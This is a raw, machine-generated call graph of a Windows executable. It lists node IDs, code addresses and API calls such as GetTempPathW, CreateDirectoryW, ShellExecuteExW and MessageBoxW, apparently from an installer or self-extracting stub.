12528 4012c3 12523->12528 12526 40128f 12895 403204 free 12526->12895 12938 403204 free 12527->12938 12897 403204 free 12528->12897 12529 40146a 12534 40368d 2 API calls 12529->12534 12530 40123b 12881 403204 free 12530->12881 12542 401476 12534->12542 12536 401297 12896 403204 free 12536->12896 12537->12527 12545 40142c 12537->12545 12908 404319 12537->12908 12539 401454 12939 403204 free 12539->12939 12541 4012cb 12547 403f77 2 API calls 12541->12547 12818 404834 GetCurrentDirectoryW 12542->12818 12543 401243 12882 403204 free 12543->12882 12923 405e4f 12545->12923 12546 40145c 12562 404ace 21 API calls 12546->12562 12551 4012dd 12547->12551 12555 4037d2 3 API calls 12551->12555 12559 4012e6 12555->12559 12558 4037d2 3 API calls 12564 401424 12558->12564 12898 403204 free 12559->12898 12560 401490 12566 401494 12560->12566 12567 4014bb 12560->12567 12563 4017a7 12562->12563 13006 403204 free 12563->13006 12922 403204 free 12564->12922 12573 4018ca 6 API calls 12566->12573 12569 4014c4 12567->12569 12570 40161a 12567->12570 12575 403740 2 API calls 12569->12575 12576 401652 12570->12576 12581 40376e 3 API calls 12570->12581 12572 4012ee 12577 403f77 2 API calls 12572->12577 12578 40149f 12573->12578 12574 4017af 13007 403204 free 12574->13007 12597 4014d0 12575->12597 12579 403740 2 API calls 12576->12579 12582 401300 12577->12582 12940 403204 free 12578->12940 12584 40165e 12579->12584 12587 40162c 12581->12587 12588 4037d2 3 API calls 12582->12588 12969 4055bc 12584->12969 12585 4017b7 13008 403204 free 12585->13008 12586 401512 12592 403740 2 API calls 12586->12592 12960 405155 12587->12960 12593 401309 12588->12593 12599 40151e ShellExecuteExW 12592->12599 12899 403204 free 12593->12899 12596 4017c2 13009 403204 free 12596->13009 12597->12586 12603 40399c 4 API calls 12597->12603 12605 401604 12599->12605 12606 40155d 12599->12606 12600 401311 12900 403204 free 12600->12900 12601 4036b0 2 API calls 12610 401673 12601->12610 12603->12586 12611 4017cd 13010 403204 free 12611->13010 12615 40131c 12901 403204 free 12615->12901 12625 4017d8 13011 403204 free 12625->13011 12627 401324 12902 403204 free 12627->12902 12638 40132c 12644 401c64 free 12638->12644 12644->12450 12703 40103d exit _XcptFilter 12705 40102d 12704->12705 12705->12408 12705->12409 12707 4143ff 12706->12707 12708 41440e GetModuleHandleW GetProcAddress 12706->12708 12707->12708 12710 414438 GetSystemDirectoryW 12707->12710 12709 414429 12708->12709 12708->12710 12709->12710 12715 401047 12709->12715 12711 414453 12710->12711 12710->12715 12712 41445e lstrlenW 12711->12712 12711->12715 12714 414479 12712->12714 12713 4144ca lstrcatW LoadLibraryExW 12713->12714 12713->12715 12714->12713 12714->12714 12714->12715 12715->12413 12717 40108b 12716->12717 12721 40302a 12716->12721 12722 403204 free 12717->12722 12718 403075 12719 40376e 3 API calls 12718->12719 12719->12717 12720 401ef8 4 API calls 12720->12721 12721->12717 12721->12718 12721->12720 12722->12426 12724 404310 12723->12724 12725 4042fe 12723->12725 12724->12430 12725->12724 12726 40376e 3 API calls 12725->12726 12726->12724 12728 403abb 12727->12728 12729 403afb 12728->12729 12730 403adc memmove 12728->12730 12729->12432 12730->12729 12732 4031dd 2 API calls 12731->12732 12733 4010fe 12732->12733 12734 4019f5 12733->12734 12735 4019ff __EH_prolog 12734->12735 13026 4053b3 12735->13026 12737 401b63 12738 405298 ctype FindCloseChangeNotification 12737->12738 12739 40111a 12738->12739 12739->12440 12739->12441 12741 401b45 12742 405298 ctype FindCloseChangeNotification 12741->12742 12742->12739 12743 401a2e 12743->12737 12743->12741 12744 401b10 memmove 12743->12744 12745 401ab7 memcmp 12743->12745 12746 401af1 memcmp 12743->12746 13029 405410 12743->13029 13033 401b7e 12743->13033 12744->12741 12744->12743 12745->12741 12745->12743 12746->12743 12749 403709 12748->12749 12750 4034e7 2 API calls 12749->12750 12751 401147 12750->12751 12751->12447 12753 404a4a __EH_prolog 12752->12753 12754 404ace 21 API calls 12753->12754 12755 404a55 12754->12755 12756 40368d 2 API calls 12755->12756 12764 401350 12755->12764 12757 404a62 12756->12757 13055 4048d6 GetTempPathW 12757->13055 12764->12464 12764->12465 12767 404a72 13077 403204 free 12767->13077 12769 409318 __EH_prolog 12768->12769 13088 4094da 12769->13088 12772 4038d0 malloc _CxxThrowException free 12774 409327 12772->12774 12773 40368d malloc _CxxThrowException 12773->12774 12774->12772 12774->12773 12776 403204 free ctype 12774->12776 12779 401397 12774->12779 13093 40940e 12774->13093 13096 409178 12774->13096 13113 409493 12774->13113 13121 401cf9 12774->13121 12776->12774 12779->12496 12779->12497 12781 4024e5 __EH_prolog 12780->12781 13186 4029f9 12781->13186 12784 4037d2 3 API calls 12785 402519 12784->12785 12786 4037d2 3 API calls 12785->12786 12787 402527 12786->12787 12788 4031dd 2 API calls 12787->12788 12789 402531 12788->12789 12791 402544 12789->12791 13265 402bc1 12789->13265 12792 4025e6 12791->12792 12793 402566 12791->12793 13196 4026c1 12792->13196 12794 418a80 2 API calls 12793->12794 12796 402591 12794->12796 12798 4025a4 12796->12798 12799 402597 12796->12799 12797 4025f1 12800 4037d2 3 API calls 12797->12800 12803 40368d 2 API calls 12798->12803 12801 418a40 ctype 2 API calls 12799->12801 12802 4025ff 12800->12802 12804 40259f 12801->12804 12802->12804 12806 4037d2 3 API calls 12802->12806 12805 4025ac 12803->12805 13255 402b65 12804->13255 12807 405fad 6 API calls 12805->12807 12806->12804 12809 4025bd 12807->12809 13279 40264d 12809->13279 12812 4025d0 13290 403204 free 12812->13290 12814 4025d8 12815 418a40 ctype 2 API calls 12814->12815 12816 4025e4 12815->12816 12816->12797 12817->12529 12819 40376e 3 API calls 12818->12819 12820 401488 12819->12820 12821 404826 SetCurrentDirectoryW 12820->12821 12821->12560 12837->12703 12838->12443 12840 403c61 __EH_prolog 12839->12840 14401 404015 12840->14401 12842 40368d malloc _CxxThrowException 12870 403c71 12842->12870 12844 403dd7 14426 403204 free 12844->14426 12846 403ddf 14427 403204 free 12846->14427 12848 403de7 14428 403204 free 12848->14428 12850 40117e 12850->12466 12850->12467 12851 4033ad 2 API calls 12851->12870 12852 403df4 14429 403204 free 12852->14429 12854 404045 malloc _CxxThrowException free _CxxThrowException 12854->12870 12855 403dfc 14430 403204 free 12855->14430 12857 401b7e malloc _CxxThrowException free memcpy _CxxThrowException 12857->12870 12858 403e19 14433 403204 free 12858->14433 12859 403e04 14431 403204 free 12859->14431 12863 403e0c 14432 403204 free 12863->14432 12864 403e21 14434 403204 free 12864->14434 12867 403e29 12868 401d5b ctype free 12867->12868 12868->12850 12869 403204 free ctype 12869->12870 12870->12842 12870->12844 12870->12850 12870->12851 12870->12852 12870->12854 12870->12857 12870->12858 12870->12869 12871 401d5b ctype free 12870->12871 14406 403e47 12870->14406 14416 403fb4 12870->14416 12871->12870 12872->12468 12874 403f8f 12873->12874 12875 403f93 12874->12875 12876 403f9c 12874->12876 12877 40368d 2 API calls 12875->12877 12878 403740 2 API calls 12876->12878 12879 4011ab 12877->12879 12878->12879 12879->12479 12880->12530 12881->12543 12882->12468 12884 401c6e __EH_prolog 12883->12884 12885 401c94 12884->12885 12887 401d3f ctype free 12884->12887 14443 403204 free 12885->14443 12887->12884 12888 401256 12889 403204 free 12888->12889 12889->12488 12890->12494 12891->12502 12892->12508 12893->12516 12894->12526 12895->12536 12896->12703 12897->12541 12898->12572 12899->12600 12900->12615 12901->12627 12902->12638 12903->12472 12904->12472 14444 405f4a LoadStringW 12905->14444 12909 404323 __EH_prolog 12908->12909 12910 40368d 2 API calls 12909->12910 12911 404338 12910->12911 14455 4043dc FormatMessageW 12911->14455 12913 404351 12915 403740 2 API calls 12913->12915 12916 4043c3 12915->12916 14460 403204 free 12916->14460 12918 4039d8 4 API calls 12920 4043ac 12918->12920 12919 40141b 12919->12558 12921 4039d8 4 API calls 12920->12921 12921->12913 12922->12545 14461 418d80 12923->14461 12925 405e59 LoadStringW 12926 405ea3 12925->12926 12927 405e93 12925->12927 12929 40368d 2 API calls 12926->12929 12928 4036b0 2 API calls 12927->12928 12930 401438 MessageBoxW 12928->12930 12931 405eab 12929->12931 12937 403204 free 12930->12937 12932 405ee5 5 API calls 12931->12932 12933 405ec0 12932->12933 12934 403740 2 API calls 12933->12934 12935 405ecb 12934->12935 14462 403204 free 12935->14462 12937->12527 12938->12539 12939->12546 12940->12472 12961 40515f __EH_prolog 12960->12961 12962 40368d 2 API calls 12961->12962 12963 405176 12962->12963 12964 404daf 16 API calls 12963->12964 12970 4055c3 12969->12970 12971 401666 12969->12971 12970->12971 12972 401ef8 4 API calls 12970->12972 12971->12601 12972->12971 13006->12574 13007->12585 13008->12596 13009->12611 13010->12625 13017->12489 13018->12495 13019->12443 13020->12449 13021->12453 13022->12457 13023->12463 13024->12475 13025->12703 13037 405392 13026->13037 13032 40541d 13029->13032 13030 4053ee ReadFile 13030->13032 13031 405449 13031->12743 13032->13030 13032->13031 13034 401b89 13033->13034 13035 401b8e 13033->13035 13043 403398 13034->13043 13035->12743 13040 405375 13037->13040 13041 40525f 2 API calls 13040->13041 13042 40538f 13041->13042 13042->12743 13046 40331b 13043->13046 13047 403361 _CxxThrowException 13046->13047 13048 40332a 13046->13048 13048->13047 13049 403332 13048->13049 13050 4031dd 2 API calls 13049->13050 13051 40333c memcpy 13050->13051 13054 403204 free 13051->13054 13053 403352 13053->13035 13054->13053 13056 40376e 3 API calls 13055->13056 13057 404917 13056->13057 13057->12767 13058 403656 13057->13058 13059 40366c 13058->13059 13060 4035d6 2 API calls 13059->13060 13061 403685 13060->13061 13062 40492e GetCurrentThreadId GetTickCount GetCurrentProcessId 13061->13062 13066 404961 13062->13066 13063 40376e 3 API calls 13063->13066 13064 4039d8 4 API calls 13064->13066 13066->13063 13066->13064 13067 4049df SetLastError 13066->13067 13068 40499d 13066->13068 13071 405489 2 API calls 13066->13071 13074 404a29 13066->13074 13075 404a0a GetLastError 13066->13075 13078 4051ae 13066->13078 13086 40447d CreateDirectoryW 13066->13086 13067->13066 13068->13066 13070 4039d8 4 API calls 13068->13070 13072 401ef8 4 API calls 13068->13072 13073 4049b1 GetTickCount 13070->13073 13071->13066 13072->13068 13073->13068 13076 403204 free 13074->13076 13075->13066 13076->12767 13077->12764 13079 4051b8 __EH_prolog 13078->13079 13080 40368d 2 API calls 13079->13080 13081 4051cf 13080->13081 13082 404daf 16 API calls 13081->13082 13083 4051dc 13082->13083 13087 403204 free 13083->13087 13085 4051e6 13085->13066 13086->13066 13087->13085 13089 409502 13088->13089 13091 4094e5 13088->13091 13089->12774 13091->13089 13127 401cc6 13091->13127 13133 403204 free 13091->13133 13094 40368d 2 API calls 13093->13094 13095 409424 13094->13095 13095->12774 13097 409182 __EH_prolog 13096->13097 13135 409279 13097->13135 13100 409279 5 API calls 13112 4091bb 13100->13112 13101 409251 13102 410da8 free 13101->13102 13103 40925c 13102->13103 13104 410da8 free 13103->13104 13106 409268 13104->13106 13105 40368d malloc _CxxThrowException 13105->13112 13106->12774 13107 4037d2 3 API calls 13107->13112 13108 4037d2 3 API calls 13110 409202 wcscmp 13108->13110 13110->13112 13111 403204 free ctype 13111->13112 13112->13101 13112->13105 13112->13107 13112->13108 13112->13111 13148 409432 13112->13148 13114 40949d __EH_prolog 13113->13114 13115 4031dd 2 API calls 13114->13115 13116 4094a8 13115->13116 13117 4094bf 13116->13117 13159 40950a 13116->13159 13119 4088fd 4 API calls 13117->13119 13120 4094cb 13119->13120 13120->12774 13122 401d03 __EH_prolog 13121->13122 13123 401d29 13122->13123 13172 401d3f 13122->13172 13177 403204 free 13123->13177 13126 401d30 13126->12774 13128 401cd0 __EH_prolog 13127->13128 13129 401cf9 ctype free 13128->13129 13130 401ce3 13129->13130 13134 403204 free 13130->13134 13132 401ceb 13132->13091 13133->13091 13134->13132 13136 409283 __EH_prolog 13135->13136 13137 4030d0 free 13136->13137 13138 409295 13137->13138 13139 40368d 2 API calls 13138->13139 13146 40929d 13139->13146 13140 4092f6 13158 403204 free 13140->13158 13142 4092e4 13142->13140 13145 403089 4 API calls 13142->13145 13143 4091b0 13143->13100 13144 401ef8 4 API calls 13144->13146 13145->13140 13146->13140 13146->13142 13146->13144 13147 403089 4 API calls 13146->13147 13147->13146 13149 40943c __EH_prolog 13148->13149 13150 4031dd 2 API calls 13149->13150 13151 409448 13150->13151 13152 403740 2 API calls 13151->13152 13153 409472 13151->13153 13154 409462 13152->13154 13155 4088fd 4 API calls 13153->13155 13156 403740 2 API calls 13154->13156 13157 409483 13155->13157 13156->13153 13157->13112 13158->13143 13160 409514 __EH_prolog 13159->13160 13161 403740 2 API calls 13160->13161 13162 40953b 13161->13162 13165 40955d 13162->13165 13167 409567 __EH_prolog 13165->13167 13166 40954b 13166->13117 13168 4031dd 2 API calls 13167->13168 13171 4095a0 13167->13171 13168->13171 13169 4031dd 2 API calls 13169->13171 13170 403740 malloc _CxxThrowException 13170->13171 13171->13166 13171->13169 13171->13170 13178 401d5b 13172->13178 13175 401d54 13175->13122 13177->13126 13184 403204 free 13178->13184 13180 401d66 13185 403204 free 13180->13185 13182 401d47 13182->13175 13183 403204 free 13182->13183 13183->13175 13184->13180 13185->13182 13187 402a03 __EH_prolog 13186->13187 13188 40368d 2 API calls 13187->13188 13189 402a12 13188->13189 13190 40368d 2 API calls 13189->13190 13191 402a1e 13190->13191 13291 402a4c 13191->13291 13194 40368d 2 API calls 13195 402504 13194->13195 13195->12784 13197 4026cb __EH_prolog 13196->13197 13198 40368d 2 API calls 13197->13198 13199 4026e6 13198->13199 13200 404daf 16 API calls 13199->13200 13201 4026f9 13200->13201 13202 40271d 13201->13202 13203 4026fd 13201->13203 13303 4028c3 13202->13303 13204 4038d0 3 API calls 13203->13204 13205 40270e 13204->13205 13409 403204 free 13205->13409 13209 4028b3 13209->12797 13210 4037d2 3 API calls 13211 402764 13210->13211 13307 40afa7 13211->13307 13214 4027b6 13217 403740 2 API calls 13214->13217 13215 40278e 13216 4038d0 3 API calls 13215->13216 13218 40279f 13216->13218 13219 4027c2 13217->13219 13386 403204 free 13218->13386 13221 4055bc 4 API calls 13219->13221 13223 4027ce 13221->13223 13222 4027a7 13387 403204 free 13222->13387 13336 40448c 13223->13336 13227 40282a 13229 4036f3 2 API calls 13227->13229 13228 4027da 13388 40b7fd 13228->13388 13252 4027af 13403 402f4a 13252->13403 13256 402b6f __EH_prolog 13255->13256 14349 403204 free 13256->14349 13258 402b88 14350 402af8 13258->14350 13262 402baa 14363 403204 free 13262->14363 13264 4013e2 13264->12521 13264->12522 13266 402bcb __EH_prolog 13265->13266 13267 40368d 2 API calls 13266->13267 13268 402bf7 13267->13268 13269 40368d 2 API calls 13268->13269 13270 402c03 13269->13270 13271 40368d 2 API calls 13270->13271 13272 402c0f 13271->13272 13273 40368d 2 API calls 13272->13273 13274 402c1f 13273->13274 14374 402c56 13274->14374 13277 40368d 2 API calls 13278 402c3a 13277->13278 13278->12791 13280 4037d2 3 API calls 13279->13280 13281 402665 13280->13281 14392 4061f9 DialogBoxParamW 13281->14392 13283 402670 14393 418a70 WaitForSingleObject 13283->14393 13285 40267a 13286 4026ae 6 API calls 13285->13286 13287 402687 SetWindowTextW 13286->13287 14394 403204 free 13287->14394 13289 40269a ShowWindow 13289->12812 13290->12814 13292 402a56 __EH_prolog 13291->13292 13293 40368d 2 API calls 13292->13293 13294 402a8b 13293->13294 13297 402aa6 13294->13297 13298 402ab0 __EH_prolog 13297->13298 13299 40368d 2 API calls 13298->13299 13300 402add 13299->13300 13301 40368d 2 API calls 13300->13301 13302 402a2e 13301->13302 13302->13194 13304 4028d3 13303->13304 13305 40368d 2 API calls 13304->13305 13306 40273d 13305->13306 13306->13210 13308 40afb1 __EH_prolog 13307->13308 13309 4031dd 2 API calls 13308->13309 13310 40afcb 13309->13310 13311 40afdd 13310->13311 13478 40b121 13310->13478 13313 40368d 2 API calls 13311->13313 13314 40b00c 13313->13314 13315 40368d 2 API calls 13314->13315 13317 40b018 13315->13317 13316 40b049 13431 40a90a 13316->13431 13317->13316 13410 40488c 13317->13410 13323 40b076 13486 403204 free 13323->13486 13324 40b0ee 13489 403204 free 13324->13489 13327 40b07e 13487 403204 free 13327->13487 13329 40b0f6 13490 403204 free 13329->13490 13330 403632 2 API calls 13335 40b09a 13330->13335 13332 402784 13332->13214 13332->13215 13333 403089 4 API calls 13333->13335 13335->13324 13335->13330 13335->13333 13488 403204 free 13335->13488 13337 404496 __EH_prolog 13336->13337 13338 404da0 GetFileAttributesW 13337->13338 13340 4044a1 13338->13340 13339 4027d6 13339->13227 13339->13228 13340->13339 13341 4036b0 2 API calls 13340->13341 13343 4044d7 13341->13343 13386->13222 13387->13252 13404 402f51 13403->13404 13405 402f63 13404->13405 14347 403204 free 13404->14347 14348 403204 free 13405->14348 13408 402f6a 13408->13205 13409->13209 13491 404821 13410->13491 13413 4048a6 13415 40376e 3 API calls 13413->13415 13414 40376e 3 API calls 13414->13413 13416 4048bf 13415->13416 13417 40b290 13416->13417 13418 40b29a __EH_prolog 13417->13418 13419 4037d2 3 API calls 13418->13419 13420 40b2af 13419->13420 13421 403632 2 API calls 13420->13421 13422 40b2bc 13421->13422 13423 404daf 16 API calls 13422->13423 13424 40b2cb 13423->13424 13554 403204 free 13424->13554 13426 40b2df 13427 40b2e4 _CxxThrowException 13426->13427 13428 40b2f9 13426->13428 13427->13428 13429 4030d0 free 13428->13429 13430 40b301 13429->13430 13430->13316 13432 40a914 __EH_prolog 13431->13432 13555 40a8e3 13432->13555 13434 40af06 malloc _CxxThrowException 13452 40a925 13434->13452 13435 4037d2 malloc _CxxThrowException free 13435->13452 13436 40ad22 13437 405def VariantClear 13436->13437 13449 40a933 13437->13449 13438 40aef9 13439 405def VariantClear 13438->13439 13439->13449 13441 40ace8 13442 40ad0e 13441->13442 13667 40a26d 13441->13667 13672 402f6e 13442->13672 13443 405def VariantClear 13443->13452 13446 402f6e free 13446->13452 13448 4037d2 3 API calls 13448->13442 13449->13323 13449->13335 13451 40ad31 13454 402f6e free 13451->13454 13452->13434 13452->13435 13452->13436 13452->13438 13452->13441 13452->13443 13452->13446 13452->13449 13452->13451 13455 40ad7b 13452->13455 13457 4028c3 2 API calls 13452->13457 13459 40adc5 13452->13459 13460 40ae5c 13452->13460 13471 40b397 malloc _CxxThrowException free memcpy 13452->13471 13477 403204 free ctype 13452->13477 13559 40a53f 13452->13559 13593 409683 13452->13593 13610 409616 13452->13610 13614 40a2c8 13452->13614 13663 409863 13452->13663 13454->13449 13456 402f6e free 13455->13456 13456->13449 13457->13452 13461 40a26d 3 API calls 13459->13461 13686 403204 free 13460->13686 13462 40add7 13461->13462 13465 4037d2 3 API calls 13462->13465 13467 40ade6 13465->13467 13466 40ae64 13687 403204 free 13466->13687 13684 403204 free 13467->13684 13470 40ae6c 13473 402f6e free 13470->13473 13471->13452 13472 40adee 13685 403204 free 13472->13685 13473->13449 13475 40adf6 13476 402f6e free 13475->13476 13476->13449 13477->13452 13479 40b12b __EH_prolog 13478->13479 13480 40368d 2 API calls 13479->13480 13481 40b158 13480->13481 13482 40368d 2 API calls 13481->13482 13483 40b16e 13482->13483 13484 40368d 2 API calls 13483->13484 13485 40b17d 13484->13485 13485->13311 13486->13327 13487->13332 13488->13335 13489->13329 13490->13332 13492 405c84 13491->13492 13495 4058fb 13492->13495 13496 405905 __EH_prolog 13495->13496 13497 40376e 3 API calls 13496->13497 13498 405918 13497->13498 13499 405976 13498->13499 13503 405925 13498->13503 13500 40368d 2 API calls 13499->13500 13501 40597e 13500->13501 13504 405994 13501->13504 13505 405989 13501->13505 13502 404898 13502->13413 13502->13414 13503->13502 13506 4036b0 2 API calls 13503->13506 13544 405ab3 GetCurrentDirectoryW 13504->13544 13507 40376e 3 API calls 13505->13507 13509 40593e 13506->13509 13510 405992 13507->13510 13539 405b0b 13509->13539 13512 4059c2 13510->13512 13514 4055bc 4 API calls 13510->13514 13547 403204 free 13512->13547 13524 4059a8 13514->13524 13515 405969 13543 403204 free 13515->13543 13518 40399c 4 API calls 13518->13515 13519 40368d 2 API calls 13520 405a28 13519->13520 13521 405a55 13520->13521 13522 405a3b 13520->13522 13523 40376e 3 API calls 13521->13523 13548 403950 13522->13548 13526 405a53 13523->13526 13524->13512 13524->13519 13528 405b0b memmove 13526->13528 13530 405a69 13528->13530 13529 403950 4 API calls 13529->13526 13531 405a7b 13530->13531 13532 405a6d 13530->13532 13534 4037d2 3 API calls 13531->13534 13552 403204 free 13532->13552 13541 405b1e 13539->13541 13540 40594a 13540->13515 13540->13518 13541->13540 13542 403c09 memmove 13541->13542 13542->13541 13543->13502 13545 40376e 3 API calls 13544->13545 13546 405af4 13545->13546 13546->13510 13547->13502 13549 403960 13548->13549 13550 40351f 4 API calls 13549->13550 13551 403973 13550->13551 13551->13529 13552->13512 13554->13426 13556 40a8ee 13555->13556 13557 40a908 13556->13557 13688 40b3e1 13556->13688 13557->13452 13560 40a549 __EH_prolog 13559->13560 13561 40a56b 13560->13561 13563 40a598 13560->13563 13562 4031dd 2 API calls 13561->13562 13564 40a572 13562->13564 13563->13564 13566 4031dd 2 API calls 13563->13566 13565 40a2c8 24 API calls 13564->13565 13571 40a63b 13565->13571 13567 40a5a8 13566->13567 13568 4037d2 3 API calls 13567->13568 13570 40a5e4 13568->13570 13569 40a608 13569->13452 13572 4053b3 2 API calls 13570->13572 13571->13569 13695 409111 13571->13695 13573 40a5f1 13572->13573 13573->13564 13574 40a5f5 GetLastError 13573->13574 13574->13569 13576 40a7b5 13704 403204 free 13576->13704 13578 403740 2 API calls 13587 40a6b6 13578->13587 13579 401ef8 4 API calls 13579->13587 13581 40399c 4 API calls 13581->13587 13582 403204 free ctype 13582->13587 13583 4037d2 malloc _CxxThrowException free 13583->13587 13584 4039d8 4 API calls 13584->13587 13585 4053b3 2 API calls 13585->13587 13586 40a891 16 API calls 13586->13587 13587->13576 13587->13578 13587->13579 13587->13581 13587->13582 13587->13583 13587->13584 13587->13585 13587->13586 13588 40a2c8 24 API calls 13587->13588 13589 40a7e5 13587->13589 13698 40a8b7 13587->13698 13588->13587 13705 403204 free 13589->13705 13591 40a7ed 13706 403204 free 13591->13706 13594 40968d __EH_prolog 13593->13594 13608 4096e0 13594->13608 13711 40349a 13594->13711 13595 409739 13596 405def VariantClear 13595->13596 13599 409741 13596->13599 13597 409746 13598 40975e 13597->13598 13600 409752 13597->13600 13601 40978e 13597->13601 13598->13601 13602 40975c 13598->13602 13599->13452 13604 40387d 4 API calls 13600->13604 13603 405def VariantClear 13601->13603 13606 405def VariantClear 13602->13606 13603->13599 13604->13602 13607 409778 13606->13607 13607->13599 13718 4097ac 13607->13718 13608->13595 13608->13597 13608->13599 13611 40963f 13610->13611 13612 405def VariantClear 13611->13612 13613 40966c 13612->13613 13613->13452 13615 40a2d2 __EH_prolog 13614->13615 13738 409dad 13615->13738 13664 40986d __EH_prolog 13663->13664 13665 405def VariantClear 13664->13665 13666 4098f0 13665->13666 13666->13452 13668 4037d2 3 API calls 13667->13668 13669 40a2b5 13668->13669 13670 4037d2 3 API calls 13669->13670 13671 40a2c1 13670->13671 13671->13448 13673 402f78 __EH_prolog 13672->13673 13943 403204 free 13673->13943 13675 402f91 13944 403204 free 13675->13944 13677 402f99 13945 403204 free 13677->13945 13679 402fa1 13946 402b4e 13679->13946 13682 402b4e free 13683 402fb4 13682->13683 13683->13449 13684->13472 13685->13475 13686->13466 13687->13470 13689 40b3f2 13688->13689 13693 40b3ff 13688->13693 13690 402f6e free 13689->13690 13691 40b3f9 13690->13691 13694 403204 free 13691->13694 13693->13556 13694->13693 13707 403547 13695->13707 13699 40a8c5 13698->13699 13700 40a8cf 13698->13700 13701 40368d 2 API calls 13699->13701 13702 403740 2 API calls 13700->13702 13703 40a8cd 13701->13703 13702->13703 13703->13587 13704->13569 13705->13591 13706->13569 13708 40355b 13707->13708 13709 4034e7 2 API calls 13708->13709 13710 403565 13709->13710 13710->13587 13712 4034c1 13711->13712 13713 4034ac _CxxThrowException 13711->13713 13714 4031dd 2 API calls 13712->13714 13713->13712 13715 4034cc 13714->13715 13734 403204 free 13715->13734 13717 4034d9 13717->13608 13719 4097b6 __EH_prolog 13718->13719 13735 409675 13719->13735 13722 4037d2 3 API calls 13723 4097f0 13722->13723 13724 40984c 13723->13724 13725 40981e 13723->13725 13728 409813 13723->13728 13727 409831 13724->13727 13724->13728 13726 401ef8 4 API calls 13725->13726 13729 405def VariantClear 13728->13729 13730 409839 13729->13730 13730->13599 13734->13717 13736 409616 VariantClear 13735->13736 13737 409680 13736->13737 13737->13722 13737->13730 13739 409db7 __EH_prolog 13738->13739 13740 40429a 2 API calls 13739->13740 13741 409e18 13740->13741 13742 40368d 2 API calls 13741->13742 13744 409e23 13742->13744 13743 409e45 13746 4031dd 2 API calls 13743->13746 13747 409e6f 13743->13747 13744->13743 13745 40376e 3 API calls 13744->13745 13745->13743 13746->13747 13748 409eb5 13747->13748 13758 409ed4 13747->13758 13749 4088fd 4 API calls 13748->13749 13750 409ebe 13749->13750 13769 409fc9 13750->13769 13771 409f7c 13750->13771 13778 406827 3 API calls 13750->13778 13752 409fb4 13752->13771 13781 406827 3 API calls 13752->13781 13753 40a175 13863 403204 free 13753->13863 13754 409144 CharUpperW 13754->13758 13756 40a17d 13758->13750 13758->13754 13762 4088fd 4 API calls 13758->13762 13825 40b406 13758->13825 13762->13758 13765 40a1bd 13866 403204 free 13765->13866 13768 40a1d6 13867 403204 free 13768->13867 13769->13765 13769->13771 13776 40a26d 3 API calls 13769->13776 13777 406827 3 API calls 13769->13777 13808 409d49 13769->13808 13811 40e520 13769->13811 13817 40ed82 13769->13817 13828 409970 13769->13828 13862 403204 free 13771->13862 13772 40a1de 13776->13769 13777->13769 13778->13752 13781->13769 13870 409d63 13808->13870 13812 40e52a __EH_prolog 13811->13812 13813 40ed82 11 API calls 13812->13813 13814 40e583 13813->13814 13815 40e58a 13814->13815 13880 410b21 13814->13880 13815->13769 13818 40ed94 13817->13818 13823 406827 3 API calls 13818->13823 13819 40eda8 13824 406827 3 API calls 13819->13824 13823->13819 13826 40b6b7 4 API calls 13825->13826 13827 40b40f memmove 13826->13827 13827->13758 13829 40997a __EH_prolog 13828->13829 13830 4099fa 13829->13830 13831 4099ea 13829->13831 13902 409903 13830->13902 13832 405def VariantClear 13831->13832 13861 4099f2 13832->13861 13861->13769 13862->13753 13863->13756 13866->13768 13867->13772 13871 409d6d __EH_prolog 13870->13871 13874 410e73 13871->13874 13875 410e7d __EH_prolog 13874->13875 13903 40990b 13902->13903 13943->13675 13944->13677 13945->13679 13951 403204 free 13946->13951 13948 402b59 13952 403204 free 13948->13952 13950 402b61 13950->13682 13951->13948 13952->13950 14347->13404 14348->13408 14349->13258 14351 402b02 __EH_prolog 14350->14351 14352 40a8e3 free 14351->14352 14353 402b15 14352->14353 14354 402b4e free 14353->14354 14355 402b21 14354->14355 14364 403204 free 14355->14364 14357 402b29 14358 410da8 free 14357->14358 14359 402b36 14358->14359 14365 402ef9 14359->14365 14362 403204 free 14362->13262 14363->13264 14364->14357 14366 402f03 __EH_prolog 14365->14366 14369 402f6e free 14366->14369 14370 402f33 14366->14370 14373 403204 free 14366->14373 14368 402b41 14368->14362 14369->14366 14372 403204 free 14370->14372 14372->14368 14373->14366 14375 402c60 __EH_prolog 14374->14375 14376 40368d 2 API calls 14375->14376 14377 402c83 14376->14377 14384 402d15 14377->14384 14381 402cba 14382 402c2b 14381->14382 14383 402cbe _CxxThrowException 14381->14383 14382->13277 14383->14382 14391 418b70 InitializeCriticalSection 14384->14391 14386 402c97 14387 418b00 CreateEventW 14386->14387 14388 418b21 GetLastError 14387->14388 14389 418b1e 14387->14389 14390 418b2b 14388->14390 14389->14381 14390->14381 14391->14386 14392->13283 14393->13285 14394->13289 14402 40403d 14401->14402 14405 404020 14401->14405 14402->12870 14403 401d5b ctype free 14403->14405 14405->14402 14405->14403 14435 403204 free 14405->14435 14407 403e51 __EH_prolog 14406->14407 14408 4033ad 2 API calls 14407->14408 14414 403e67 14408->14414 14409 403ea0 14436 4033cf 14409->14436 14413 403eb4 14413->12870 14414->14409 14415 401b7e 5 API calls 14414->14415 14415->14414 14417 403fbe __EH_prolog 14416->14417 14418 4031dd 2 API calls 14417->14418 14419 403fca 14418->14419 14420 403ff4 14419->14420 14421 403740 2 API calls 14419->14421 14422 4088fd 4 API calls 14420->14422 14423 403fe4 14421->14423 14424 404005 14422->14424 14425 403740 2 API calls 14423->14425 14424->12870 14425->14420 14426->12846 14427->12848 14428->12850 14429->12855 14430->12859 14431->12863 14432->12850 14433->12864 14434->12867 14435->14405 14440 403376 14436->14440 14439 403204 free 14439->14413 14441 4031dd 2 API calls 14440->14441 14442 40338a 14441->14442 14442->14439 14443->12888 14445 405f9b 14444->14445 14446 405f8b 14444->14446 14450 405ee5 14445->14450 14447 40376e 3 API calls 14446->14447 14449 405f99 14447->14449 14449->12537 14451 405ef6 14450->14451 14452 405f08 LoadStringW 14451->14452 14453 40349a 4 API calls 14451->14453 14452->14451 14454 405f1d 14452->14454 14453->14452 14454->14449 14456 404401 14455->14456 14457 404346 14455->14457 14458 40376e 3 API calls 14456->14458 14457->12913 14457->12918 14459 40440b LocalFree 14458->14459 14459->14457 14460->12919 14461->12925 14462->12930 14556 4109cf 14557 4109a1 14556->14557 14558 4109db 14556->14558 14559 4031dd 2 API calls 14558->14559 14560 4109e9 14559->14560 14561 407b3a 2 API calls 14560->14561 14563 4109fe 14561->14563 14562 410a02 14678 403204 free 14562->14678 14563->14562 14566 40e966 _CxxThrowException 14563->14566 14567 410a1d 14563->14567 14565 410b19 14566->14567 14568 40ea46 _CxxThrowException 14567->14568 14569 410a5d 14568->14569 14570 410ad6 14569->14570 14571 410a74 